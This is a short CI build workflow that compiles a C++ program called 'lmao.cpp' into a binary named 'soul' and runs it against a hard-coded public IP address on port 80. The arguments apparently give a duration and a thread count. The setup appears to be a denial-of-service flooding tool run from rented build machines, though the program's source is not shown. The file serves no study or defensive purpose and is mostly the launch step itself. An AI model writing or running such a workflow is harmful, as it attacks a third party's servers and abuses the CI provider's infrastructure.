workflows:
  linux-cpp-build:
    name: C++ Build & Run (Linux X4)
    max_build_duration: 10
    instance_type: linux_x4

    scripts:
      - name: Show System Info
        script: |
          echo "CPU Architecture:"
          uname -m
          echo "CPU Cores:"
          nproc

      - name: Build and Run C++ Program
        script: |
          echo "Compiling..."
          g++ -std=c++14 -O3 -march=native lmao.cpp -o soul -pthread

          echo "Making executable..."
          chmod +x soul

          echo "Running..."
          ./soul 216.202.205.235 80 60 200
